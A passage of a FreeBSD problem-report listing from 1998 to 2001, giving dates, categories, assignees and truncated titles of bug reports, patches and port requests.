utmp entry s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 jkoshy Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 gad lpd cannot send long files to HP's JetDir o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 mikeh /bin/chio code cleaup and option added o [1998/02/14] bin/5745 nik [PATCH] Add /usr/local/share/mk to defaul o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT a [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/11] gnu/5982 no error exit code from tar on child fail f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl f [1998/03/31] bin/6183 quota hangups a [1998/03/31] kern/6184 No error if resulting file pos in lseek i a [1998/04/16] misc/6320 mike Sometimes nohup isn't good enough. o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 joe Kernel version strings need to relate to f [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 bsd.man.mk can't handle man pages with ": o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje s [1998/05/17] kern/6668 babkin [PATCH] new driver: Virtual Ethernet driv s [1998/05/29] bin/6785 place for all the default dump flags s [1998/06/01] kern/6820 jesper cd9660_mount NULL pointer deref for no CD f [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/22] ports/7023 portmgr bsd.port.(%|subdir.).mk patches for size s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b s [1998/06/28] i386/7100 integrate pcvt configuration into the /et a [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % f [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 qa Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). f [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m a [1998/07/19] bin/7324 Suggestions for minor modifications to ad s [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] gnu/7687 description of default baud rate for cu c s [1998/08/22] kern/7722 Changes to acct format o [1998/09/03] bin/7828 Add a command line option to cp to make i s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/16] misc/7946 asami ccdconfig gives confusing error when give o [1998/09/18] bin/7973 gad lpd: Bad control file owner in case of re s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/27] ports/8063 portmgr [PATCH] Add multiple CDROM support to bsd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/27] i386/8474 repquota does not pick up NIS information a [1998/10/28] bin/8479 dd Final \'s in /etc/exports did not work in f [1998/10/30] kern/8498 dwmalone Race condition between unp_gc() and accep o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> f [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/27] i386/8867 qa /stand/sysinstall core dumps (signal 11) o [1998/12/16] ports/9107 portmgr Addition to bsd.port.mk for searching mul a [1998/12/18] bin/9123 kris pax can't read tar archives that contain f [1998/12/28] misc/9220 ache nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy a [1999/01/05] bin/9333 jkoshy timestamp dump's progress f [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/22] kern/9619 Restarting mountd kills existing mounts f [1999/01/25] kern/9679 fix for uninterruptible open in portal fi f [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. f [1999/01/28] kern/9748 error in queue handling of at_shutdown() a [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 cg Generic AD1816 sound suport in Luigi's pc o [1999/01/31] ports/9840 portmgr patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/02] bin/10358 yar ftp(1) has problems with long pathnames f [1999/03/05] ports/10396 asami SPIN is in the wrong category f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. f [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 groudier Default sync rate in ncr SCSI driver is s o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] ports/10682 portmgr List mirror sites in MASTER_SITE_BACKUP - o [1999/04/03] bin/10931 biff b o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/13] bin/11114 make(1) does not work as documented with o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag f [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] bin/11248 Shuffle o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/19] kern/11789 obrien ELF machine definition missing for ARM o [1999/05/28] bin/11914 wosch makewhatis during installworld uses /usr/ o [1999/05/29] bin/11929 symorder doesn't work on elf format objec f [1999/05/30] kern/11945 mjacob tape problems on -stable, mt bl(ocksize), f [1999/05/31] kern/11968 kldload should call module entry point be f [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/03] kern/12014 alfred Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/21] conf/12324 qa Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 portmgr Adds refetch functionallity to bsd.port.m s [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 peter kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics p [1999/07/20] kern/12723 des Unnecessary use of magic numbers in F_[SG o [1999/07/25] bin/12801 nvi infinite recursion with options "left o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/04] ports/12952 portmgr make _PORT_USE touch cookies by variable, f [1999/08/04] kern/12966 wpaul receiver lockups in vr0 driver f [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna f [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque o [1999/08/21] bin/13309 billf Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for ' cannot be used in "via" o [2000/05/30] kern/18909 dwmalone select(2) timeout limited to 100000000 se o [2000/06/01] ports/18960 portmgr Add USE_APACHE to bsd.port.mk for Apache o [2000/06/01] bin/18961 green sshd does not print before motd o [2000/06/03] bin/18992 brian log packets blocked by filter rules o [2000/06/03] misc/18997 markm Kerberos5 CFLAGS needed f [2000/06/04] conf/19001 Delayed fsck + mount of insignificant fil o [2000/06/06] ports/19051 asami New target for bsd.port.mk : fetchdepends f [2000/06/06] bin/19057 offer of patch to uname that produces pre o [2000/06/07] ports/19112 portmgr files with names something,v in patches d o [2000/06/09] kern/19156 jkh Enable the doFS.sh to run in arbitrary lo o [2000/06/11] kern/19213 SC_DFLT_FONT compile option breaks kernel f [2000/06/13] conf/19236 sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] bin/19239 login allows users to login remotely with o [2000/06/13] misc/19246 portmgr Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 portmgr Ports build mechanism doesn't check wheth o [2000/06/15] gnu/19327 Fix to build 'a.out' binary. o [2000/06/19] misc/19391 emulationEvilness with Linux Terminus, causes X to o [2000/06/20] bin/19404 /usr/bin/error should be included in the o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/22] ports/19448 markm filename input broken o [2000/06/23] misc/19467 green OpenSSH (as an rsync tunnel) blocks forev o [2000/06/24] kern/19490 faith0 network device has high number of o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup s [2000/06/28] conf/19573 des Dot Files for Optional Shells o [2000/06/29] ports/19591 ports ssh2 port ignores 'ignorenologin' from lo o [2000/06/30] ports/19594 trevor update port: qrash o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault o [2000/07/03] bin/19683 green mount displays incorrect mount point on f a [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/06] gnu/19733 mp GDB 4.18 is not GDB 4.18 o [2000/07/07] kern/19756 Inability to use linux extended partition o [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 ambrisko Run Fit it floppy from serial port o [2000/07/12] ports/19868 portmgr modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 alfred select on named pipes always returns 'ava o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/18] gnu/20004 FBSD4 gcc __attribute__(constructor) not o [2000/07/18] misc/20024 tmm [PATCH] queue(3) concatenation macros o [2000/07/19] bin/20042 "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] misc/20159 strftime() can't produce ISO8601 format t o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/28] misc/20254 jhb BTX loader 1.00 can not recognize floppy o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 ftp login fails on unix password when s/k o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/02] ports/20359 demon New port: Apache-mod_perl_guide f [2000/08/02] bin/20371 murray dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 o [2000/08/05] conf/20436 Can't make only cd0 under 4.1-STABLE o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/09] ports/20499 obrien [PATCH] conserver port doesn't like MD5 c o [2000/08/09] bin/20501 mjacob extra flag to dump to offline autoloaders a [2000/08/10] ports/20520 olgeni New port: lang/mercury o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. s [2000/08/10] kern/20529 billf gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin a [2000/08/14] ports/20610 patrick New port of cgoban2 o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/17] ports/20678 portmgr make SORTED_MASTER_SITES_CMD variable ove o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri f [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/28] bin/20908 qa /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/29] kern/20927 ume dmesg output: looutput: mbuf allocation f o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd o [2000/09/02] bin/21008 gad Fix for lpr's handling of lots of jobs in o [2000/09/04] bin/21024 pow() ERANGE bug o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 dwmalone top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc o [2000/09/09] bin/21142 [PATCH] avoid errors from "make objlink" o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm s [2000/09/10] bin/21178 ken voltag selector, and unload support for c o [2000/09/12] kern/21222 dillon wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm f [2000/09/16] ports/21313 mbr vmwarIPv6 and vmware2 panic: Fatal trap 1 o [2000/09/16] bin/21315 Shells often behave oddly when executing o [2000/09/22] misc/21494 yar ftpd can't handle /etc/chroot entries wit o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more o [2000/09/24] bin/21531 csh/tcsh provide no way to see/adjust new f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/28] ports/21621 portmgr Update port: devel/libtool to 1.3.5 f [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin s [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/10/01] i386/21672 obrien AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21754 n_hibma Sound stops working when NetGear USB Devi o [2000/10/05] bin/21766 [PATCH] add -s (skip) flag to head(1) o [2000/10/05] docs/21767 green sample sshd_config errors for kerberos o [2000/10/05] kern/21768 rwatson shouldn't trailing '/' on regular file sy o [2000/10/06] bin/21806 lock(1) currently defaults to 15 minute t a [2000/10/06] kern/21807 [patches] Make System attribute correspon o [2000/10/07] docs/21826 wollman ARP proxy feature lacks documentation o [2000/10/09] kern/21859 Allow the syncer to be slowed down o [2000/10/09] ports/21885 portmgr bsd.port.mk: test for old layout is too o [2000/10/09] misc/21886 jkh wicontrol desired on boot floopy o [2000/10/10] ports/21903 portmgr bsd.ports.mk - automake/aclocal adds o [2000/10/14] conf/21994 Config of Anonftp (at install) always cre o [2000/10/14] gnu/21996 use of -s and -C causes tar to dump core o [2000/10/16] bin/22033 [PATCH] to pw(8) to allow encrypted passw o [2000/10/16] bin/22034 nfsstat lacks useful features found in So o [2000/10/17] kern/22065 luigi Patch to add support to ipfw for per rule f [2000/10/17] kern/22068 4.1.1-RELEASE does not recognise (no prob o [2000/10/18] misc/22073 xonsole: couldn't open console f [2000/10/18] kern/22099 Xircom CreditCard CM-56T Modem keeps givi o [2000/10/18] conf/22102 Local scripts get run before securelevel o [2000/10/20] ports/22149 portmgr Enhance the "Old port layout" message fro o [2000/10/21] bin/22182 vi options noprint/print/octal broken o [2000/10/21] kern/22185 Identical IP addresses on two broadcast i o [2000/10/21] misc/22190 jasone A threaded read(2) from a socketpair(2) f o [2000/10/21] bin/22198 inet_ntop may set errno to ENOSPC and nee o [2000/10/22] bin/22210 wollman typeof(passwd->pw_gid) != typeof(group->g o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m o [2000/10/26] misc/22332 request to add vtys to /etc/ttys o [2000/10/27] bin/22351 sed(1) fails with backslash on buffer bou o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/30] ports/22412 taoka two extraneous ports and one name change o [2000/10/31] bin/22442 greid [PATCH] Increase speed of split(1) s [2000/11/01] docs/22470 doc man 3 msgrcv's BUGS section needs updatin o [2000/11/02] ports/22550 obrien Patch for conserver for log file rotation o [2000/11/04] kern/22602 CDRoms checked during shutdown (umount) o [2000/11/04] bin/22612 schweikh crontab -e failures o [2000/11/06] conf/22645 Cannot override "ignore" in /etc/mail.rc o [2000/11/07] misc/22660 termcap kterm entry tc=xterm is wrong a [2000/11/08] misc/22696 luigi picobsd build with router configuration c o [2000/11/08] ports/22698 portmgr Ports' rc.d files should use rc.conf o [2000/11/09] bin/22730 fenner tcpslice doesn't handle long file offsets o [2000/11/14] bin/22860 yar [PATCH] adduser & friends with '$' in use o [2000/11/14] docs/22861 dd newsyslog man page is misleading and inco o [2000/11/15] kern/22868 getsockname may return an incorrect addre o [2000/11/15] misc/22873 markm Perl's core'h conflicts with ncurses.h o [2000/11/16] i386/22900 patch: Adds Brand ID support to src/sys/i o [2000/11/17] misc/22914 bootinst messages are not updated s [2000/11/17] conf/22916 green Ssh/sshd binaries lacks kerberos support o [2000/11/17] bin/22933 green Typographical error in ssh.1 f [2000/11/20] ports/22995 grog Update port: x11-servers/x2x (fix ports/2 o [2000/11/23] conf/23063 ru [PATCH] for static ARP tables in rc.netwo o [2000/11/24] bin/23082 dwmalone ntpd has only one reference-clock parser o [2000/11/25] bin/23097 Enhance WEP some more including ability t o [2000/11/27] misc/23148 getopt(3) works non-intuitively? o [2000/11/29] bin/23178 'talk' not doing right thing o [2000/11/29] bin/23180 Certain KOI8 characters are treated as "w o [2000/12/01] bin/23204 length of salt in crypt() is not the same o [2000/12/02] bin/23233 kris Reincorporate /usr/bin/error in the FreeB a [2000/12/03] bin/23254 fenner yacc accepts bad grammer o [2000/12/05] kern/23304 POSIX clock_gettime, clock_getres return f [2000/12/05] kern/23314 aic driver fails to detect Adaptec 1520B f [2000/12/07] misc/23362 fenner tcpdump wrong on sppp CISCO_HDLC encoded o [2000/12/07] misc/23366 mmap() non conforming o [2000/12/07] gnu/23367 some src/gnu Makefiles are missing $FreeB a [2000/12/09] conf/23402 qa sysinstall upgrade ought to check partiti o [2000/12/11] bin/23472 mp gdb weirdness on programs compiled with - o [2000/12/13] kern/23520 sb0 old style audio support in 4.2-RELEAS o [2000/12/13] misc/23539 marcel make installworld from nfs mounted /usr/s o [2000/12/14] kern/23546 tanimura [PATCH] csa DMA-interrupt problem o [2000/12/14] ports/23560 portmgr linux-jdk/Makefile assumes default `patch o [2000/12/15] i386/23562 telnetd doesn't show message in file spec o [2000/12/15] ports/23581 portmgr Updates to bsd.port.mk to detect changing o [2000/12/17] gnu/23598 Merge libgcc_r with libgcc o [2000/12/17] ports/23602 portmgr Recursive distclean for bsd.port.mk w/pat o [2000/12/18] bin/23635 mike [PATCH] whois enhancement - smarter whois f [2000/12/20] kern/23692 GENERIC kernel config on 4.2 changes defa o [2000/12/22] misc/23766 /etc/periodic/daily/440.status-mailq does o [2000/12/24] kern/23814 .au sound files < 528 bytes actual data d o [2000/12/24] ports/23822 ports mtree entries for German X11 man pages a [2000/12/28] bin/23912 sheldonh underflow of cnt in vs_paint() by O_NUMBE o [2000/12/29] bin/23944 Patch for ftpd to add a cd after the chro o [2001/01/04] bin/24066 mp gdb can't detach from programs linked wit o [2001/01/06] ports/24120 portmgr "/usr/ports/Mk/bsd.port.mk", line 626: In o [2001/01/07] misc/24132 mp gdb output is wrong (same as #13427 ?) o [2001/01/07] kern/24141 sound emu10k1 has trouble playing non-44.1KHz s o [2001/01/10] ports/24214 portmgr [PATCH] verbose 'make index' o [2001/01/11] ports/24259 steve port of open-motif on make install compla o [2001/01/12] ports/24292 portmgr update-patches target in ports/Mk/bsd.por o [2001/01/12] ports/24299 ports Configure the synaptics touchpad. o [2001/01/15] ports/24361 asami wrong filemodes o [2001/01/16] misc/24384 4.1 Cant add entry to neighbour discovery o [2001/01/16] bin/24390 Replacing old dir-symlinks when using /bi o [2001/01/16] kern/24393 Patch to msdosfs to handle a kind of inco o [2001/01/18] bin/24435 Changing slice type causes Auto-partition o [2001/01/20] bin/24485 [PATCH] to make cron(8) handle clock jump o [2001/01/20] ports/24493 msmith Pib maker function unable to launch xterm a [2001/01/21] kern/24512 jesper Sent ICMP unreach when packet not for us o [2001/01/21] misc/24513 peter new options for pppd o [2001/01/21] conf/24515 Fix for find(1) warning in /etc/rc o [2001/01/21] bin/24521 green ssh-agent exits when authenticating DSA v o [2001/01/22] kern/24528 Bad tracking of Modem status o [2001/01/23] bin/24592 cjc dmesg.boot Gets Overwritten without Reboo o [2001/01/25] ports/24651 mharo portlint gives a bogus warning o [2001/01/26] ports/24658 jkh Enhancement to src/release/Makefile o [2001/01/26] alpha/24663 alpha Console output gets scribbled into /var/l o [2001/01/27] gnu/24681 gcc 2.95.3 cannot compile rince.c from IO o [2001/01/27] ports/24687 ports QUAKE FORGE & SVGALIB o [2001/01/30] ports/24736 trevor New port: SGI's open inventor (graphics/i o [2001/01/30] bin/24742 send adduser.message before dirs are crea o [2001/01/30] ports/24743 chuckr a2ps port installs files in / o [2001/01/30] misc/24746 green SSH terminal hangs on large paste of data o [2001/01/30] ports/24749 dirk mysql323-server pkg-install script doesn' o [2001/01/31] bin/24757 ftpd not RFC compliant o [2001/02/01] docs/24786 doc missing FILES descriptions in sa(4) o [2001/02/02] docs/24797 phk when using MALLOC_DEFINE sys/param.h and o [2001/02/03] kern/24827 yokota Erratic Intellimouse Explorer in 4.1 and o [2001/02/03] bin/24828 [PATCH] ntpd compilation and additional r f [2001/02/04] gnu/24844 gdb does not support Linux threads a [2001/02/05] docs/24869 keramida Some text elf.5 is duplicated o [2001/02/05] kern/24882 ktrace not syncing .out file before panic o [2001/02/06] kern/24900 Server logs:indfcntl(8, F_SETFL, 4): Inap o [2001/02/06] kern/24902 IPC Message Queue number to big o [2001/02/06] misc/24907 qa Options screen at MenuMedia menu problem o [2001/02/07] ports/24940 demon prolem with Tnm::icmp echo command due to o [2001/02/08] bin/24953 green adduser ignores passwd_format in login.co o [2001/02/08] kern/24959 jesper proper TCP_NOPUSH/TCP_CORK compatibility o [2001/02/08] i386/24963 perfmon(4) doesn't work on SMP systems o [2001/02/09] ports/24983 asami Emacs ports have misleading names o [2001/02/11] bin/25012 tar(1) as root does not preserve ownershi o [2001/02/11] bin/25013 mv(1) cannot move unresolvable symlinks a o [2001/02/11] bin/25015 cp: options -i and -f do not work as docu a [2001/02/11] docs/25016 ru symlink(7) manpage says symlinks have no o [2001/02/11] bin/25017 cp -pRP does not preserve symlink ownersh o [2001/02/11] kern/25018 lstat(2) returns bogus permissions on sym o [2001/02/12] ports/25031 ache www/apache: dbmmanage fails verifying md5 o [2001/02/13] bin/25070 newsyslog(8) should send signals only onc o [2001/02/13] bin/25085 msmith mlxcontrol utility fails silently if devi o [2001/02/15] misc/25109 Fujitsu MO device MCC3064AP could't be c o [2001/02/19] misc/25218 peter mailwrapper invokes sendmail when resourc o [2001/02/20] bin/25241 luigi ipfw shouldn't show dynamics rules when s f [2001/02/21] bin/25263 green openssh and /etc/login.access does not wo o [2001/02/21] bin/25273 add fs type feature to vnconfig(8) to all f [2001/02/21] kern/25275 X server freezes system randomly on pentu f [2001/02/22] bin/25278 dd bs accepts -s -c but not -sc o [2001/02/22] alpha/25284 alpha PC164 won't reboot with graphics console o [2001/02/23] ports/25313 wosch Script source displayed at http://www.nl. o [2001/02/26] misc/25378 kris update contrib/libgmp to newer version (3 o [2001/02/26] kern/25386 cg Incorrect mixer registers (line & synth) o [2001/02/26] docs/25405 wosch misleading warning from catman(1), etc. o [2001/02/27] kern/25445 kernel statistics are displayed in wrong f [2001/02/28] gnu/25459 Dumpvalue.pm says SYNOPSYS instead of SYN o [2001/02/28] bin/25462 daemon(3) fails if called by a session le f [2001/02/28] i386/25463 PS/2 mouse sync problems with KVM switch o [2001/03/01] bin/25477 billf pam_radius fix to allow null passwords fo o [2001/03/02] ports/25490 wosch [PATCH] fix various bugs in stat(1) a [2001/03/02] misc/25499 buffer paste functionality from keyboard o [2001/03/04] kern/25521 Laptop with FreeBSD4.2 freezes in battery f [2001/03/04] conf/25527 jdp `man ldconfig' does not reflect its behav o [2001/03/04] ports/25531 portmgr INSTALL_* macros fail for non-root users a [2001/03/05] ports/25560 ports New port: ftp/kbear: An ftp client for KD o [2001/03/05] ports/25564 obrien Port ups-debug doesn't build on the alpha o [2001/03/06] bin/25572 sshd core dump o [2001/03/06] ports/25576 jmz XFree86-4 port installs manual pages with s [2001/03/07] bin/25587 des Add Solaris-like functionality to truss(1 o [2001/03/07] bin/25598 patch to let ftpd output message when cha s [2001/03/09] bin/25627 Cannot append hash after .elif in Makefil o [2001/03/09] misc/25635 gad lpr -# didn't work on network printer a [2001/03/11] ports/25708 dougb pine4 port hard-code /usr/local/include o [2001/03/11] ports/25710 ports New port: news/slrn-pl, slrn with polish o [2001/03/11] bin/25723 green OpenSSH on 4.2 excessively regenerates RS o [2001/03/12] bin/25724 quota(1) outputs wrong limits about NFS q o [2001/03/12] kern/25733 mismatch between error reporting in smbus o [2001/03/12] bin/25736 ac -d option probrem with overdays logon o [2001/03/12] ports/25763 shige XV fails to refresh properly on image dis o [2001/03/13] kern/25777 atime not updated on exec o [2001/03/13] ports/25779 portmgr (patch) make fetch-list should list all m o [2001/03/14] gnu/25794 markm [PATCH] make perl use a decent random num f [2001/03/14] ports/25815 portmgr [PATCH] Port build collision fix. o [2001/03/15] conf/25829 IPSec config in rc.network doesn't allow o [2001/03/16] kern/25866 more than 256 ptys, up to 1302 ptys. o [2001/03/17] ports/25878 tegge error during compilation of linuxthreads o [2001/03/18] kern/25909 4.x kernel freezes on P3-Asus CUSL2-C mot o [2001/03/18] kern/25910 cg Kernel sound driver may die if a program o [2001/03/19] misc/25917 green Paste thrue SSH Secure Shell v.2.4.0 (bui f [2001/03/19] kern/25923 vm_map.h defines a macro called "min_offs o [2001/03/21] misc/25984 bsd.prog.mk doesn't link C++ programs pro f [2001/03/22] docs/26003 rwatson getgroups(2) lists NGROUPS_MAX but not sy o [2001/03/22] bin/26005 MIME quoted-printable encoding added to v a [2001/03/22] docs/26006 des Changing zone(9) man page o [2001/03/22] kern/26016 VMWare is crash on SMP machine f [2001/03/23] misc/26035 System hangs when playing mp3 on PCI Maes o [2001/03/27] conf/26145 [PATCH] There is no make.conf equivalent o [2001/03/28] ports/26192 ports apel appeared both in xemacs/site-package o [2001/03/29] bin/26201 telnet SRA password exchange trap when no o [2001/04/01] kern/26277 ppc driver doesn't work with port 0x3BC p o [2001/04/02] docs/26286 doc *printf(3) etc should gain format string o [2001/04/02] ports/26303 adrian Wrong permission on Squid24's errors dire o [2001/04/03] kern/26316 Booting FreeBSD on VMware2 with 2 or 3 et o [2001/04/03] misc/26323 Quota system create zero-length files o [2001/04/03] kern/26324 dillon Defaults for NFS mounts over TCP are slow o [2001/04/04] kern/26348 [pcvt] scon -s, page fault in HP mode o [2001/04/04] bin/26359 [PATCH] a minor nit in how netstat detect o [2001/04/06] bin/26375 markm PAMized su allows non-wheel members to su o [2001/04/06] kern/26385 VMWare reboots entire system after starti f [2001/04/08] kern/26437 Kernel Panics on SMP box when subjected t o [2001/04/09] kern/26454 cg mixer volume settings on Maestro-2E (Diam o [2001/04/09] bin/26468 pkg_delete clears dependencies after runn o [2001/04/10] conf/26488 incomplete named sandbox information a [2001/04/13] docs/26532 green ".Ql ?" becomes "`'?" through nroff (and a [2001/04/13] kern/26534 Add an option to ipfw to log gid/uid of w o [2001/04/13] 